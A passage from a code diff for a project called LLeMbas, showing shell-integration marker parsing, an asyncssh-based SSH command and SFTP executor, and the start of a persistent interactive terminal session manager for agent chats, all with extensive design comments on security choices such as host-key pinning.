f' bash) printf %s {quote(BASH_RC)} > "$__L/rc" 2>/dev/null && '
' exec bash --rcfile "$__L/rc" -i ;; '
f' zsh) printf %s {quote(ZSH_ENV)} > "$__L/.zshenv" 2>/dev/null && '
f' printf %s {quote(ZSH_PROFILE)} > "$__L/.zprofile" 2>/dev/null && '
f' printf %s {quote(ZSH_RC)} > "$__L/.zshrc" 2>/dev/null && '
f' printf %s {quote(ZSH_LOGIN)} > "$__L/.zlogin" 2>/dev/null && '
# The user's own ZDOTDIR is captured *here*, before it is replaced.
' LEMBAS_DIR="$__L" LEMBAS_USER_ZDOTDIR="${ZDOTDIR:-$HOME}" '
' ZDOTDIR="$__L" exec zsh -l ;; '
"esac; "
# Everything that did not exec lands here: an unknown shell, a failed
# mkdir, a full /tmp. You still get a shell.
'rm -rf -- "$__L" 2>/dev/null; exec ${SHELL:-/bin/sh} -l'
)
# --- Reading them back -------------------------------------------------------
_UNESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
def unescape(value: str) -> str:
"""Undo `__lembas_esc`."""
return _UNESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value).replace("\\\\", "\\")
class Marks:
"""Pulls the markers out of a stream that arrives in any pieces.
Deliberately not a regex over the scrollback. The pump is handed 64 KB at a
time on no particular boundary, so the ESC and the `]` land in different
frames often enough to matter -- which is the same reason nothing here
decodes the bytes. This holds at most one partial marker and nothing else.
"""
def __init__(
self,
on_mark: Callable[[str, str], None],
on_text: Callable[[bytes], None] | None = None,
) -> None:
self._on_mark = on_mark
self._on_text = on_text
self._buffer = bytearray()
self._in_marker = False
self._plain = bytearray()
def feed(self, data: bytes) -> None:
"""Split the stream into markers and everything else.
Both come back *in order* and as they are found, not after the whole
chunk has been scanned. That matters: a shell frequently writes the
command marker, the output and the finished marker in one 64KB read, so
anything that scanned first and absorbed afterwards would find the
capture already closed and keep nothing.
"""
for byte in data:
if not self._in_marker:
# A lone ESC is held: the ']' may be in the next frame.
if byte == _ESC:
self._flush()
self._buffer = bytearray([byte])
self._in_marker = True
else:
self._plain.append(byte)
continue
if len(self._buffer) == 1:
if byte != 0x5D: # ']' -- some other escape sequence
# Not ours, so it is output like anything else. Emitted
# rather than dropped: `clean_output` strips it later, and
# swallowing it here would silently eat a colour change.
self._in_marker = False
self._plain += self._buffer
self._plain.append(byte)
self._buffer.clear()
continue
self._buffer.append(byte)
continue
# Two legal terminators, and shells in the wild use both: BEL, and
# ESC \ (ST). The ESC has to be *appended* rather than treated as
# the start of something new, or the ST branch below can never fire.
if byte == _BEL:
self._finish()
continue
self._buffer.append(byte)
if self._buffer.endswith(b"\x1b\\"):
del self._buffer[-2:]
self._finish()
continue
# An `ESC ]` inside a marker that was never terminated starts a new
# one. Without this a truncated marker would eat the next.
if self._buffer.endswith(b"\x1b]"):
self._buffer = bytearray(b"\x1b]")
continue
if len(self._buffer) > MAX_MARKER_BYTES:
# Not one of ours. Output is worth more than a marker.
self._in_marker = False
self._plain += self._buffer
self._buffer.clear()
self._flush()
def _flush(self) -> None:
if not self._plain:
return
if self._on_text is not None:
self._on_text(bytes(self._plain))
self._plain.clear()
def _finish(self) -> None:
payload = bytes(self._buffer[2:]).decode("utf-8", "replace")
self._in_marker = False
self._buffer.clear()
code, _, rest = payload.partition(";")
if code not in ("133", "633") or not rest:
return
kind, _, value = rest.partition(";")
self._on_mark(kind, value)
__all__ = [
"BASH_RC",
"MARK_COMMAND",
"MARK_CWD",
"MARK_DONE",
"MARK_OUTPUT",
"MARK_PROMPT",
"MARK_READY",
"MAX_MARKER_BYTES",
"Marks",
"ZSH_ENV",
"ZSH_LOGIN",
"ZSH_PROFILE",
"ZSH_RC",
"command_for",
"quote",
"unescape",
]
-505
View File
@@ -1,505 +0,0 @@
"""Acting on a machine over SSH.
Connections are made per call, for the reason MCP sessions are, plus one more: a
live `SSHClientConnection` is exactly the kind of state `ToolContext` exists so
that nothing holds. A command is already a network round trip inside a reply
that takes seconds, so a second one to open the channel is not the cost worth
optimising.
**Four asyncssh defaults are actively wrong here, and all four are passed
explicitly on every connection.** Every LLeMbas user shares one unix account, so
"whatever the account has lying around" is never the right answer:
* `known_hosts` unset reads that shared `~/.ssh/known_hosts` -- one trust store
for everybody. Set to `None` it disables host key checking altogether, which
is never correct and is the single easiest way to make this insecure.
* `client_keys` unset loads `~/.ssh/id_*`, so one person's chat could
authenticate with a key another person left there, or with the server's own.
* `config` unset reads `~/.ssh/config`, where a `Hostname` or `ProxyCommand`
can send the connection somewhere else entirely.
* `agent_path` unset silently uses `$SSH_AUTH_SOCK`.
`asyncssh` is an optional dependency, imported inside the functions that need it
so an instance with agents switched off never pays for it and an instance that
forgot to install it gets a sentence rather than an ImportError at startup.
"""
from __future__ import annotations
import contextlib
import logging
import time
from typing import Any
from lembas.db.models import AUTH_PASSWORD, SshProfile
from lembas.services.agent.base import (
Conflict,
ExecError,
ExecRequest,
ExecResult,
RemoteEntry,
RemoteFile,
clean_output,
revision_of,
)
from lembas.services.crypto import decrypt
log = logging.getLogger(__name__)
# A file read into a model's context, and one written out of it. Both bounded:
# the first because a 40 MB log would fill the window, the second because
# nothing a model writes in one call should be larger than this.
MAX_READ_BYTES = 256 * 1024
MAX_WRITE_BYTES = 1024 * 1024
# How many entries a directory listing returns before it is cut short.
MAX_ENTRIES = 500
INSTALL_HINT = (
"SSH support is not installed. Run `pip install -e \".[ssh]\"` in the "
"LLeMbas virtual environment and restart."
)
def available() -> str:
"""Empty when SSH can be used, else why it cannot.
Shaped like `search.availability`, and used the same way: the feature stays
visible in the UI with an install hint rather than silently missing.
"""
try:
import asyncssh # noqa: F401
except ImportError:
return INSTALL_HINT
return ""
def spec_from(profile: SshProfile) -> dict[str, Any]:
"""A session-free snapshot of one profile, credential decrypted.
Called while the session is open. The plaintext lives in the returned dict
and nowhere else; `generation` drops it when the reply ends.
"""
return {
"id": profile.id,
"label": profile.label,
"host": profile.host,
"port": int(profile.port or 22),
"username": profile.username,
"auth": profile.auth,
"password": decrypt(profile.password_encrypted),
"private_key": decrypt(profile.private_key_encrypted),
"key_passphrase": decrypt(profile.key_passphrase_encrypted),
"host_key": profile.host_key,
"connect_timeout": int(profile.connect_timeout or 15),
}
def connect_kwargs(spec: dict[str, Any]) -> dict[str, Any]:
"""Everything asyncssh must be told rather than left to discover.
See the module docstring: every one of these has a default that is wrong
when one unix account is shared by every user of the instance.
"""
if not spec.get("host_key"):
raise ExecError(
"This connection's host key has not been confirmed yet. Open it "
"under Agents and press Check, then accept the fingerprint."
)
keys: list = []
if spec.get("auth") != AUTH_PASSWORD and spec.get("private_key"):
import asyncssh
try:
keys = [
asyncssh.import_private_key(
spec["private_key"], passphrase=spec.get("key_passphrase") or None
)
]
except Exception as exc: # noqa: BLE001 - any failure here is one message
raise ExecError(f"That private key could not be read: {exc}") from exc
timeout = int(spec.get("connect_timeout") or 15)
return {
"username": spec["username"],
"port": int(spec.get("port") or 22),
# Bytes, never None. None turns host key checking off entirely.
"known_hosts": spec["host_key"].encode(),
"client_keys": keys,
"password": (spec.get("password") or None) if spec.get("auth") == AUTH_PASSWORD else None,
"config": None,
"agent_path": None,
"connect_timeout": timeout,
"login_timeout": timeout,
}
async def capture_host_key(host: str, port: int, *, timeout: int = 15) -> tuple[str, str]:
"""The host's key as a known_hosts line, and its SHA256 fingerprint.
`get_server_host_key` completes the key exchange and stops, so nothing is
offered to a host that has not been accepted yet -- no username, no
password, no key. That is what makes trust-on-first-use safe to do from a
button rather than only from a terminal.
"""
if problem := available():
raise ExecError(problem)
import asyncio
import asyncssh
try:
key = await asyncio.wait_for(
asyncssh.get_server_host_key(host, port=port), timeout=timeout
)
except TimeoutError as exc:
raise ExecError(f"{host} did not answer within {timeout}s.") from exc
except (OSError, asyncssh.Error) as exc:
raise ExecError(f"Could not reach {host}: {exc}") from exc
if key is None:
raise ExecError(f"{host} offered no host key.")
algorithm = key.get_algorithm()
encoded = key.export_public_key("openssh").decode().split()[1]
where = f"[{host}]:{port}" if port != 22 else host
return f"{where} {algorithm} {encoded}\n", key.get_fingerprint("sha256")
class SshExecutor:
"""One target, reached over SSH. A connection per call."""
def __init__(self, spec: dict[str, Any], project_dir: str = "") -> None:
self.spec = spec
self.project_dir = project_dir or ""
self.label = str(spec.get("label") or spec.get("host") or "the remote host")
def _connect(self):
if problem := available():
raise ExecError(problem)
import asyncssh
return asyncssh.connect(self.spec["host"], **connect_kwargs(self.spec))
def _wrap(self, exc: Exception) -> ExecError:
import asyncssh
if isinstance(exc, asyncssh.HostKeyNotVerifiable):
return ExecError(
f"{self.label} presented a different host key than the one that "
"was confirmed. Nothing was sent. If the host was rebuilt, open "
"it under Agents and confirm the new fingerprint."
)
if isinstance(exc, asyncssh.PermissionDenied):
return ExecError(f"{self.label} refused the credential.")
return ExecError(f"Could not reach {self.label}: {exc}")
async def run(self, request: ExecRequest) -> ExecResult:
"""Run one command and read back what it said.
Every command is a fresh shell, so `cd` does not carry between calls --
the working directory is set here, from `cwd` or the chat's project
directory, and never spliced into the command string.
"""
import asyncssh
started = time.monotonic()
directory = request.cwd or self.project_dir
# A single-quoted path, with any embedded quote escaped. `cd` needs a
# shell, so this is the one place a path meets one -- and it is a path
# from the chat's own configuration, not from the model, except when the
# model passed `cwd`, which is why it is quoted rather than trusted.
command = request.command
if directory:
command = f"cd {_quote(directory)} && {command}"
try:
async with self._connect() as conn:
result = await conn.run(
command,
check=False,
timeout=request.timeout,
# Interleaved, because a shell transcript is what the model
# has to read and separating them loses the ordering.
stderr=asyncssh.STDOUT,
# A command that waits for input fails at once instead of
# sitting out its whole timeout in silence.
stdin=asyncssh.DEVNULL,
)
except TimeoutError:
elapsed = int((time.monotonic() - started) * 1000)
return ExecResult(
exit_status=-1,
output=f"The command was still running after {request.timeout:g}s and was stopped.",
timed_out=True,
duration_ms=elapsed,
)
except (OSError, asyncssh.Error) as exc:
raise self._wrap(exc) from exc
output, truncated = clean_output(result.stdout or "", limit=request.max_bytes)
return ExecResult(
exit_status=result.exit_status if result.exit_status is not None else -1,
output=output,
truncated=truncated,
duration_ms=int((time.monotonic() - started) * 1000),
)
# --- Files go over SFTP, never through a shell ---------------------------
# The SSH exec protocol carries one command *string* that the far side's
# shell parses; there is no argv form. So a path in a command line is
# unavoidably a quoting problem, and a model-supplied path is exactly the
# input that must not become one. Over SFTP a path is a path.
async def read_file(self, path: str, *, max_bytes: int = MAX_READ_BYTES) -> str:
import asyncssh
try:
async with (
self._connect() as conn,
conn.start_sftp_client() as sftp,
sftp.open(self._resolve(path), "rb") as handle,
):
data = await handle.read(max_bytes + 1)
except asyncssh.SFTPNoSuchFile as exc:
raise ExecError(f"There is no file at {path}.") from exc
except asyncssh.SFTPPermissionDenied as exc:
raise ExecError(f"Not allowed to read {path}.") from exc
except (OSError, asyncssh.Error) as exc:
raise self._wrap(exc) from exc
text, _truncated = clean_output(data[:max_bytes], limit=max_bytes)
return text
async def write_file(self, path: str, text: str) -> int:
import asyncssh
payload = text.encode("utf-8")[:MAX_WRITE_BYTES]
try:
async with (
self._connect() as conn,
conn.start_sftp_client() as sftp,
sftp.open(self._resolve(path), "wb") as handle,
):
await handle.write(payload)
except asyncssh.SFTPPermissionDenied as exc:
raise ExecError(f"Not allowed to write {path}.") from exc
except (OSError, asyncssh.Error) as exc:
raise self._wrap(exc) from exc
return len(payload)
# --- The same files, for somebody about to edit them ---------------------
# Deliberately not `read_file`/`write_file`, and those two are deliberately
# left exactly as they are: what they return is a contract a model has been
# shown, and it is the right contract for a model.
#
# It is the wrong one for an editor. `read_file` ends in `clean_output`,
# which strips ANSI escape sequences and decodes with errors="replace" --
# correct for the output of a command, and for a file it means that opening
# one containing an escape byte and pressing Save rewrites it with the
# escapes gone and every undecodable byte replaced by U+FFFD. `write_file`
# truncates at MAX_WRITE_BYTES, which a model is told about and a person
# pressing Save is not.
async def read_text(self, path: str, *, max_bytes: int = MAX_READ_BYTES) -> RemoteFile:
"""A file as somebody is about to edit it.
Strict decoding, so a file this cannot represent faithfully is reported
as binary rather than silently mangled into something that would be
saved back. The stat and the read share one connection: connections are
per call, so doing it in two is two handshakes and two authentications
to open one file.
"""
import asyncssh
try:
async with (
self._connect() as conn,
conn.start_sftp_client() as sftp,
sftp.open(self._resolve(path), "rb") as handle,
):
attrs = await handle.stat()
data = await handle.read(max_bytes + 1)
except asyncssh.SFTPNoSuchFile as exc:
raise ExecError(f"There is no file at {path}.") from exc
except asyncssh.SFTPPermissionDenied as exc:
raise ExecError(f"Not allowed to read {path}.") from exc
except (OSError, asyncssh.Error) as exc:
raise self._wrap(exc) from exc
truncated = len(data) > max_bytes
data = data[:max_bytes]
size = int(getattr(attrs, "size", None) or len(data))
mtime = int(getattr(attrs, "mtime", None) or 0)
# A NUL in the first few kilobytes, or anything that will not decode.
# Either way there is nothing safe to put in a textarea.
if b"\0" in data[:8192]:
return RemoteFile("", size, mtime, truncated, binary=True)
try:
text = data.decode("utf-8")
except UnicodeDecodeError:
return RemoteFile("", size, mtime, truncated, binary=True)
return RemoteFile(text, size, mtime, truncated, binary=False)
async def write_text(self, path: str, text: str, *, if_unchanged: str = "") -> RemoteFile:
"""Write a file, refusing if it moved under the editor.
`if_unchanged` is the token `read_text` handed out. The re-stat and the
write happen on one connection, which is the narrowest window SFTP
allows; there is no compare-and-swap here and this does not pretend to
be atomic. It catches what it exists for -- another editor, a build, a
checkout between opening a tab and pressing Save -- and not a race
measured in milliseconds.
Oversize is refused rather than truncated. `write_file` truncates
because a model is told how many bytes it wrote; somebody pressing Save
would lose the tail of their file with nothing said.
"""
import asyncssh
payload = text.encode("utf-8")
if len(payload) > MAX_WRITE_BYTES:
raise ExecError(
f"That is {len(payload) // 1024}KB and the limit is "
f"{MAX_WRITE_BYTES // 1024}KB. Nothing was written."
)
target = self._resolve(path)
try:
async with self._connect() as conn, conn.start_sftp_client() as sftp:
if if_unchanged:
current = ""
with contextlib.suppress(asyncssh.SFTPNoSuchFile):
attrs = await sftp.stat(target)
current = revision_of(
int(getattr(attrs, "mtime", None) or 0),
int(getattr(attrs, "size", None) or 0),
)
if current and current != if_unchanged:
raise Conflict(current)
async with sftp.open(target, "wb") as handle:
await handle.write(payload)
attrs = await sftp.stat(target)
except asyncssh.SFTPPermissionDenied as exc:
raise ExecError(f"Not allowed to write {path}.") from exc
except (OSError, asyncssh.Error) as exc:
raise self._wrap(exc) from exc
return RemoteFile(
text,
len(payload),
int(getattr(attrs, "mtime", None) or 0),
truncated=False,
binary=False,
)
async def list_dir(self, path: str = "") -> list[str]:
import asyncssh
try:
async with self._connect() as conn, conn.start_sftp_client() as sftp:
target = self._resolve(path) if path else (self.project_dir or ".")
names = await sftp.listdir(target)
except asyncssh.SFTPNoSuchFile as exc:
raise ExecError(f"There is no directory at {path or self.project_dir}.") from exc
except (OSError, asyncssh.Error) as exc:
raise self._wrap(exc) from exc
visible = sorted(n for n in names if n not in (".", ".."))
return visible[:MAX_ENTRIES]
async def scan_dir(self, path: str = "") -> list[RemoteEntry]:
"""A listing with types, for a picker rather than for a model.
`readdir` rather than `listdir`: the latter returns bare names, and a
browser has to know which rows can be walked into before it can draw
them. Directories sort first and then by name, because that is the
order somebody navigating expects -- `list_dir` keeps its plain
lexicographic sort, since changing what a tool returns is changing a
contract a model has already been shown.
"""
import stat
import asyncssh
try:
async with self._connect() as conn, conn.start_sftp_client() as sftp:
target = self._resolve(path) if path else (self.project_dir or ".")
names = await sftp.readdir(target)
except asyncssh.SFTPNoSuchFile as exc:
raise ExecError(f"There is no directory at {path or self.project_dir}.") from exc
except asyncssh.SFTPPermissionDenied as exc:
raise ExecError(f"Not allowed to read {path or self.project_dir}.") from exc
except (OSError, asyncssh.Error) as exc:
raise self._wrap(exc) from exc
entries: list[RemoteEntry] = []
for item in names:
name = item.filename
if name in (".", ".."):
continue
attrs = item.attrs
permissions = getattr(attrs, "permissions", None) or 0
entries.append(
RemoteEntry(
name=name,
is_dir=stat.S_ISDIR(permissions),
size=getattr(attrs, "size", None) or 0,
modified=int(getattr(attrs, "mtime", None) or 0),
)
)
entries.sort(key=lambda entry: (not entry.is_dir, entry.name.lower()))
return entries[:MAX_ENTRIES]
def _resolve(self, path: str) -> str:
"""A path relative to the project directory, unless it is absolute.
Deliberately *not* a containment check. The account on the far side is
the boundary -- a profile whose user can only see /srv/project can only
reach things under it -- and pretending otherwise here would be a
comfort rather than a control, since `shell_run` could walk out of it in
one line anyway.
"""
if not path:
return self.project_dir or "."
if path.startswith("/") or not self.project_dir:
return path
return f"{self.project_dir.rstrip('/')}/{path.lstrip('/')}"
def _quote(value: str) -> str:
return "'" + value.replace("'", "'\\''") + "'"
async def check(spec: dict[str, Any], project_dir: str = "") -> dict[str, Any]:
"""Connect, confirm the project directory, and report what was found.
Used by the Check button on a profile. Runs one harmless command rather than
only opening a connection, because "the credential works" and "the directory
is there" are the two things somebody is actually asking about.
"""
executor = SshExecutor(spec, project_dir)
result = await executor.run(
ExecRequest(command="uname -sr 2>/dev/null; pwd", timeout=15, max_bytes=4096)
)
lines = [line for line in result.output.splitlines() if line.strip()]
return {
"ok": result.ok,
"system": lines[0] if lines else "",
"cwd": lines[-1] if len(lines) > 1 else "",
"output": result.output,
}
__all__ = [
"INSTALL_HINT",
"MAX_ENTRIES",
"MAX_READ_BYTES",
"SshExecutor",
"available",
"capture_host_key",
"check",
"connect_kwargs",
"spec_from",
]
-751
View File
@@ -1,751 +0,0 @@
"""Interactive shells, one per agent chat, held open behind the panel.
The other half of `ssh.py`. There a connection lives for one command, because a
runner is a request-and-answer and holding state would be the wrong shape. Here
the connection *is* the state: a PTY with a shell on the far side, its scrollback,
and whoever is currently watching it.
Shaped after `services/generation.py` -- a registry, a background task that owns
the work, and a socket that merely follows it -- and it differs in three ways
worth knowing:
* **Keyed on the chat, not on a session of its own.** A reload is
indistinguishable from a second tab, so anything finer needs an id in the
browser's storage, and then an abandoned tab leaks a shell nothing in the UI
can find. One chat, one shell. Two tabs share it, like `tmux attach` twice,
which is the only reading under which "it is still there when you come back"
means anything. They also share a size, and the smaller one wins.
* **Nothing here ends by itself.** A generation finishes, so `generation.ensure`
can prune inside itself. A shell sits at a prompt forever and nothing calls in
again, so there is a reaper task instead. Copying the generation shape here
would mean nothing was ever swept.
* **A slow reader is dropped, not buffered.** Every viewer has a bounded queue;
one that fills is disconnected and reattaches with the scrollback. Blocking
the pump instead would stall every other viewer and buffer without bound
inside the server -- and `yes` is one word to type.
What a person types here is deliberately not run past `agent/policy.py`. The
modes and the two lists govern a *model*, which reads untrusted pages and files
and can be talked into things. Somebody at a keyboard holds the credential
already and could open the same shell with an ssh client; asking them to approve
their own keystrokes would be theatre.
"""
from __future__ import annotations
import asyncio
import contextlib
import logging
import time
import uuid
from collections import deque
from dataclasses import dataclass, field
from typing import Any
from lembas.services.agent import capture, shell_marks
from lembas.services.agent.base import ExecError
from lembas.services.agent.ssh import available, connect_kwargs
log = logging.getLogger(__name__)
# What one shell keeps to hand a returning viewer. Bytes rather than lines: a
# line budget is dishonest about a program that writes one very long line.
SCROLLBACK_BYTES = 256 * 1024
# How much output one viewer may fall behind by before it is dropped. Frames
# are whatever the far side wrote, so this is generous in wall-clock terms and
# only reached by a browser that has genuinely stopped reading.
VIEWER_QUEUE = 512
# Read size. Large enough that `cat` of a big file is not a million wakeups,
# small enough that a prompt appears the instant it is written.
READ_BYTES = 64 * 1024
# A terminal nobody has ever heard of gets no colours; this one every shell
# knows and it is what an ordinary ssh client announces.
TERM_TYPE = "xterm-256color"
# A size is a number the browser sends. `change_terminal_size(100000, 100000)`
# is a way to ask the far side to allocate.
MAX_COLS = 500
MAX_ROWS = 300
MIN_COLS = 20
MIN_ROWS = 5
# How long a closed session stays in the registry. A tab attaching a second
# after the shell exited should be told what happened rather than silently
# handed a fresh one.
KEEP_CLOSED = 60.0
# How often the reaper looks. Nothing here is urgent: the idle timeout is
# measured in minutes.
REAP_INTERVAL = 30.0
# Why a session ended. The browser is told, and the wording differs enough to be
# worth the constants.
CLOSED_EXITED = "exited"
CLOSED_IDLE = "idle"
CLOSED_SHUTDOWN = "shutdown"
CLOSED_REVOKED = "revoked"
CLOSED_ERROR = "error"
# Whether this shell tells us where its commands begin and end.
# live -- it does
# loading -- the hooks went in; the first prompt has not arrived yet
# none -- it never will: an unknown shell, or a dotfile that replaced it
INTEGRATION_LIVE = "live"
INTEGRATION_LOADING = "loading"
INTEGRATION_NONE = "none"
# How long a shell may produce output without ever marking a prompt before we
# conclude it is not going to. This is what catches a `.bashrc` ending in `exec
# tmux`: the hooks were installed and then the shell replaced itself. Without
# it the buttons stay greyed out forever with no explanation.
INTEGRATION_GRACE = 10.0
@dataclass
class Viewer:
"""One browser watching one shell."""
cols: int = 80
rows: int = 24
id: str = field(default_factory=lambda: uuid.uuid4().hex)
queue: asyncio.Queue = field(default_factory=lambda: asyncio.Queue(maxsize=VIEWER_QUEUE))
# Everything the shell has said so far, handed over in the same synchronous
# call that subscribes. Reading the buffer and subscribing as two awaits
# loses whatever arrives between them.
snapshot: bytes = b""
# Set when this viewer fell behind. It is woken with the sentinel below and
# told to reconnect, which costs it nothing: the scrollback is the state.
dropped: bool = False
class Session:
"""A shell on the far side of one chat's connection."""
def __init__(
self,
chat_id: str,
*,
owner_id: str,
profile_id: str,
label: str,
project_dir: str = "",
idle_timeout: float = 1800.0,
cols: int = 80,
rows: int = 24,
integrate: bool = True,
) -> None:
self.chat_id = chat_id
self.owner_id = owner_id
self.profile_id = profile_id
self.label = label
self.project_dir = project_dir
self.idle_timeout = idle_timeout
self.viewers: dict[str, Viewer] = {}
self._scrollback: deque[bytes] = deque()
self._scrollback_bytes = 0
# --- Command boundaries ---------------------------------------------
# Three states, and the middle one matters: INTEGRATION_LOADING means
# the hooks were installed and no marker has arrived yet, which is a
# different thing to tell somebody than "this shell will never mark".
self.integrate = integrate
self.integration = INTEGRATION_LOADING if integrate else INTEGRATION_NONE
self.shell = ""
self._marks = shell_marks.Marks(self._on_mark, self._on_text)
# At most two, ever. The one being written and the last finished one --
# a history would be a second scrollback with none of the bounding.
self.current: capture.Capture | None = None
self.last: capture.Capture | None = None
self._captures = 0
# Where the shell says it is, which the panel header shows live and a
# capture records. Seeded from the chat so it says something sensible
# before the first prompt.
self.cwd = project_dir
# Set by the socket layer, which knows how to shape a frame. Called
# when a command finishes so a panel can enable its buttons without
# polling for something that happens a few times a minute.
self.on_command: Any = None
self._conn: Any = None
self._process: Any = None
self._pump: asyncio.Task | None = None
self.closed = False
self.closed_reason = ""
self.closed_at = 0.0
self.started_at = time.monotonic()
# Bumped by a keystroke and by a viewer coming or going. Idle is this
# going quiet *with nobody attached*: a build running behind a closed
# panel is the case this whole lifetime exists for.
self.last_active = time.monotonic()
# The size the PTY is *created* with, which matters: a shell prints its
# prompt before anything could resize it, and a prompt drawn at 80
# columns inside a 140-column window stays wrong until the next one.
self.cols = _clamp(cols, MIN_COLS, MAX_COLS)
self.rows = _clamp(rows, MIN_ROWS, MAX_ROWS)
# --- Opening -------------------------------------------------------------
async def start(self, spec: dict[str, Any]) -> None:
"""Connect, ask for a PTY, and start pumping what it says.
The credential is used here and not kept. `spec` is a decrypted snapshot
of a profile and the connection outlives the request that made it, so
holding a private key in memory for the hour a shell sits at a prompt
buys nothing.
"""
if problem := available():
raise ExecError(problem)
import asyncssh
try:
self._conn = await asyncssh.connect(
spec["host"],
**connect_kwargs(spec),
# asyncssh sends no keepalives by default. `SshExecutor` never
# needed them because its connections live for one command; a
# shell held open behind NAT otherwise gets dropped with no FIN
# and no exception, and the pump simply never returns -- the
# panel looks alive and answers nothing.
keepalive_interval=30,
keepalive_count_max=3,
)
self._process = await self._conn.create_process(
self._command(),
term_type=TERM_TYPE,
term_size=(self.cols, self.rows),
# Bytes in both directions. A read lands mid-character often
# enough to matter, and the browser's decoder is stateful across
# writes while a per-frame decode here is not: it would corrupt
# every boundary. Nothing decodes, so nothing can split.
encoding=None,
stderr=asyncssh.STDOUT,
)
except asyncssh.HostKeyNotVerifiable as exc:
await self._teardown()
raise ExecError(
f"{self.label} presented a different host key than the one that "
"was confirmed. Nothing was sent."
) from exc
except asyncssh.PermissionDenied as exc:
await self._teardown()
raise ExecError(f"{self.label} refused the credential.") from exc
except (OSError, asyncssh.Error) as exc:
await self._teardown()
raise ExecError(f"Could not reach {self.label}: {exc}") from exc
self._pump = asyncio.create_task(self._read_forever())
def _command(self) -> str | None:
"""What the PTY runs, or None for the account's plain login shell.
A shell has no notion of "start here" that SSH can carry, so the chat's
project directory has to be a `cd` -- run before the shell rather than
typed into it, so the scrollback opens on a prompt instead of on a
command nobody entered. It is single-quoted, and a failure is ignored:
a directory that has been deleted should leave somebody at a shell to
find out why, not with a connection that closes as it opens.
With integration on, the same string also writes the shell-integration
files and execs through them; see `shell_marks` for why it is done in
the command rather than over SFTP or through the environment.
"""
return shell_marks.command_for(self.project_dir, integrate=self.integrate)
# --- Where one command ends and the next begins --------------------------
def _on_mark(self, kind: str, value: str) -> None:
"""One marker, from the scanner in the pump.
Advisory, never trusted: a program can print these itself and move a
boundary. It is not a way in -- the text is sanitised and fenced either
way, and a program could already print anything on screen -- but that is
why nothing here validates them, and why none of it decides anything a
person could not already do at the keyboard.
"""
if kind == shell_marks.MARK_READY:
self.integration = INTEGRATION_LIVE
self.shell = value.split(";")[0][:32]
return
if self.integration != INTEGRATION_LIVE and kind in (
shell_marks.MARK_PROMPT,
shell_marks.MARK_OUTPUT,
):
self.integration = INTEGRATION_LIVE
if kind == shell_marks.MARK_CWD:
path = shell_marks.unescape(value.partition("=")[2])[:1000]
self.cwd = path
return
if kind == shell_marks.MARK_COMMAND:
self._captures += 1
self.current = capture.Capture(
seq=self._captures,
command=capture.trim_command(shell_marks.unescape(value)),
cwd=self.cwd,
)
return
if kind == shell_marks.MARK_DONE and self.current is not None:
try:
self.current.exit_status = int(value.strip() or 0)
except ValueError:
self.current.exit_status = 0
self.current.ended = time.monotonic()
self.last = self.current
self.current = None
if self.on_command is not None:
self.on_command(self.last)
def _on_text(self, data: bytes) -> None:
"""Everything that was not a marker, while a command is running.
Interleaved with `_on_mark` rather than applied to the whole chunk
afterwards: a shell often writes the command marker, the output and the
finished marker in one read, and absorbing after the scan would find
the capture already closed and keep nothing at all.
"""
if self.current is not None:
self.current.absorb(data)
def latest(self) -> capture.Capture | None:
"""The command to act on: the one still running, else the last one.
In-flight counts. "Copy the last command and its output" while `make` is
still going should give what has been printed so far, marked as still
running -- not "nothing yet".
"""
return self.current or self.last
# --- Following -----------------------------------------------------------
def attach(self, cols: int = 80, rows: int = 24) -> Viewer:
"""Subscribe, and take the scrollback, in one synchronous step.
One step on purpose: reading the buffer and subscribing as two awaits
loses whatever the shell says between them, which is exactly the moment
somebody reattaches to a build that is still writing.
"""
viewer = Viewer(
cols=_clamp(cols, MIN_COLS, MAX_COLS),
rows=_clamp(rows, MIN_ROWS, MAX_ROWS),
)
viewer.snapshot = b"".join(self._scrollback)
self.viewers[viewer.id] = viewer
self.last_active = time.monotonic()
self.apply_size()
return viewer
def detach(self, viewer: Viewer) -> None:
self.viewers.pop(viewer.id, None)
# Counts as activity: the timeout is "nobody has been here and nothing
# has happened for a while", so it starts when the last viewer leaves.
self.last_active = time.monotonic()
self.apply_size()
async def send(self, data: bytes) -> None:
"""Type into the shell."""
if self.closed or self._process is None:
return
self.last_active = time.monotonic()
try:
self._process.stdin.write(data)
except (BrokenPipeError, ConnectionResetError, OSError):
await self._finish(CLOSED_EXITED)
def resize(self, viewer: Viewer, cols: int, rows: int) -> None:
"""Record this viewer's size and give the far side the smallest.
Two tabs on one PTY cannot each have their own geometry. The smaller
wins in both directions, so nothing is drawn off the edge of the smaller
window -- the larger one gets an unused margin, which is the harmless
half of the trade.
"""
viewer.cols = _clamp(cols, MIN_COLS, MAX_COLS)
viewer.rows = _clamp(rows, MIN_ROWS, MAX_ROWS)
self.apply_size()
def apply_size(self) -> None:
"""Synchronous: `change_terminal_size` only queues a window-change
message, so there is nothing to await and no reason to make every
caller a coroutine."""
if self.closed or self._process is None or not self.viewers:
return
cols = min(v.cols for v in self.viewers.values())
rows = min(v.rows for v in self.viewers.values())
if (cols, rows) == (self.cols, self.rows):
return
self.cols, self.rows = cols, rows
with contextlib.suppress(Exception):
self._process.change_terminal_size(cols, rows)
# --- The pump ------------------------------------------------------------
async def _read_forever(self) -> None:
assert self._process is not None
try:
while True:
data = await self._process.stdout.read(READ_BYTES)
if not data:
break
self._remember(data)
# Before the fan-out, so a "this command finished" frame can
# never reach a browser after the output it describes.
self._observe(data)
self._fan_out(data)
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001 - one shell dying is not a crash
log.info("terminal %s ended: %s", self.chat_id, exc)
await self._finish(CLOSED_ERROR)
return
await self._finish(CLOSED_EXITED)
def _observe(self, data: bytes) -> None:
"""Watch the stream for markers, and feed the command being captured.
Server-side rather than in the browser, for five reasons. The `behind`
path calls `term.reset()` and replays a *truncated* scrollback, so a
client parser routinely sees a "finished" with no matching "started".
Two tabs share one shell and two parsers can disagree about what "the
last command" is. The server sees the stream once however many are
watching. And what comes out of this ends up inside a prompt -- deriving
it here means there is nothing to disbelieve later.
The bytes are still fanned out unchanged, markers and all: xterm
consumes an OSC it has no handler for and never draws it, and rewriting
frames on the hot path would break the "nothing decodes, so nothing can
split" property the pump depends on.
"""
self._marks.feed(data)
if self.current is None and (
self.integration == INTEGRATION_LOADING
and time.monotonic() - self.started_at > INTEGRATION_GRACE
):
# Output arrived, the grace period passed, and no marker ever came.
# Output arrived, the grace period passed, and no marker ever came.
# Something replaced the shell -- a dotfile ending in `exec tmux` is
